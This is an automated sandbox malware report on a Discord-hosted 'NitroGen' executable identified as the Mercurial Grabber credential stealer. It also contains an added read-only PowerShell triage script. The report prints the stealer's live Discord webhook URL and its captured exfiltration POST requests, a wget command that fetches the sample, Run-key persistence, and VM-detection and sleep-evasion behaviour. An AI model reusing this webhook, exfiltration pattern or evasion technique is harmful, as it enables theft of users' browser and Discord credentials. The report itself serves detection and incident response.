Windows Analysis Report https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe

Overview

General Information

Sample URL: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Analysis ID: 517177

Detection

MercurialGrabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected MercurialGrabber
Antivirus detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
PE file contains strange resources
Drops PE files
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

AV Detection:

Found malware configuration
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
Yara detected MercurialGrabber
Source: Yara match File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Avira: detection malicious, Label: HEUR/AGEN.1143801
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Avira: detection malicious, Label: HEUR/AGEN.1143801

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBB20E CryptUnprotectData, 6_2_00007FFC08BBB20E
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBB241 CryptUnprotectData, 6_2_00007FFC08BBB241
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBB25E CryptUnprotectData, 6_2_00007FFC08BBB25E
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC0893AD7A CryptUnprotectData, 17_2_00007FFC0893AD7A
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC0893B25E CryptUnprotectData, 17_2_00007FFC0893B25E

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: ip4.seeip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 448 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 315 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 704 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 307 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 315 Expect: 100-continue
Source: global traffic HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Accept: */* Accept-Encoding: identity Host: cdn.discordapp.com Connection: Keep-Alive

E-Banking Fraud:

Yara detected MercurialGrabber

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Yara signature match
Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Detected potential crypto function
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BB61F6 6_2_00007FFC08BB61F6
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBBD99 6_2_00007FFC08BBBD99
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BB6FA2 6_2_00007FFC08BB6FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC08936FA2 17_2_00007FFC08936FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC0893BD99 17_2_00007FFC0893BD99
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC089361F6 17_2_00007FFC089361F6
PE file contains strange resources
Source: NitroGenV0.5.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NitroGenV0.5.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\wget.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
Source: unknown Process created: C:\Users\user\Desktop\download\NitroGenV0.5.exe "C:\Users\user\Desktop\download\NitroGenV0.5.exe"
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\Desktop\cmdline.out
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File created: C:\Users\user\AppData\Local\Temp\cookies.db
Source: classification engine Classification label: mal100.troj.spyw.evad.win@8/11@7/5
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_01
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\wget.exe Code function: 4_2_009F29B6 pushfd ; ret 4_2_009F2CF2
Source: C:\Windows\SysWOW64\wget.exe Code function: 4_2_009EC354 push eax; ret 4_2_009EC355
Source: C:\Windows\SysWOW64\wget.exe Code function: 4_2_009EC350 push eax; ret 4_2_009EC351
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC08930443 pushad ; ret 17_2_00007FFC08930451

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe
Source: C:\Windows\SysWOW64\wget.exe File created: C:\Users\user\Desktop\download\NitroGenV0.5.exe
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial Grabber
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX

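Added example, not part of the Joe Sandbox report and not code from the Mercurial Grabber project: a PowerShell triage script that checks a Windows host for the persistence and drop artifacts recorded above, namely the Run value named Mercurial Grabber, the copy dropped to %LOCALAPPDATA%\Temp\NitroGenV0.5.exe, the cookies.db written next to it, and any running process with that image name. It assumes the dropped copy keeps the original file name (as it did in this run) and compares the file hash with the four reference hashes from the MAL_Luna_Stealer_Apr_2021_1 rule, which are hashes of the samples that rule was written against, not necessarily of this sample.

```powershell
# Added example (not from the report or the Mercurial Grabber project): read-only
# triage of a Windows host for the artifacts this report records for NitroGenV0.5.exe.
# Run in the context of the affected user; the Run key written by the sample is per-user.

# Artifacts taken from the report. The dropped file name is assumed to equal the
# original name, which is what the sandbox observed.
$RunValueName = 'Mercurial Grabber'
$DroppedPaths = @(
    (Join-Path $env:LOCALAPPDATA 'Temp\NitroGenV0.5.exe'),
    (Join-Path $env:LOCALAPPDATA 'Temp\cookies.db')
)
# Reference hashes listed in the Yara rule metadata (samples the rule was built on).
$RuleHashes = @(
    'a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18',
    '93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f',
    '0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21',
    'ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a'
)
$MetaMembers = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
$Findings = @()

# 1. Run-key persistence: HKCU as in the report, HKLM added for completeness.
foreach ($hive in 'HKCU:', 'HKLM:') {
    $key = "$hive\Software\Microsoft\Windows\CurrentVersion\Run"
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($null -eq $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -in $MetaMembers) { continue }   # skip provider metadata members
        if ($p.Name -eq $RunValueName -or "$($p.Value)" -match 'NitroGenV0\.5\.exe') {
            $Findings += [pscustomobject]@{ Type = 'RunKey'; Where = "$key\$($p.Name)"; Detail = $p.Value }
        }
    }
}

# 2. Dropped files, hashed so the result can be compared with the rule hashes or
#    submitted to a threat-intel lookup.
foreach ($path in $DroppedPaths) {
    if (-not (Test-Path -LiteralPath $path)) { continue }
    $sha = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash.ToLower()
    $detail = "SHA256=$sha"
    if ($sha -in $RuleHashes) { $detail += ' (matches a reference sample of MAL_Luna_Stealer_Apr_2021_1)' }
    $Findings += [pscustomobject]@{ Type = 'DroppedFile'; Where = $path; Detail = $detail }
}

# 3. Running copies of the sample, matched on image name.
Get-CimInstance -ClassName Win32_Process -Filter "Name = 'NitroGenV0.5.exe'" | ForEach-Object {
    $Findings += [pscustomobject]@{ Type = 'Process'; Where = $_.ExecutablePath; Detail = "PID=$($_.ProcessId)" }
}

if ($Findings.Count -eq 0) { 'No Mercurial Grabber artifacts from this report were found.' }
else { $Findings | Format-Table -AutoSize -Wrap }
```

The script only reports; deleting the Run value and the dropped files, and rotating any browser or Discord credentials the stealer could have reached, are separate steps once the findings are confirmed.
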
Malware Analysis System Evasion:

Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98684s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99892s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6412 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 1744 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99642s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99391s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99281s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98813s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98642s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99906s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99797s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6928 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Window / User API: threadDelayed 2881 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Window / User API: threadDelayed 404 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Window / User API: threadDelayed 718 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Window / User API: threadDelayed 2482 Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99890 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99781
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99671
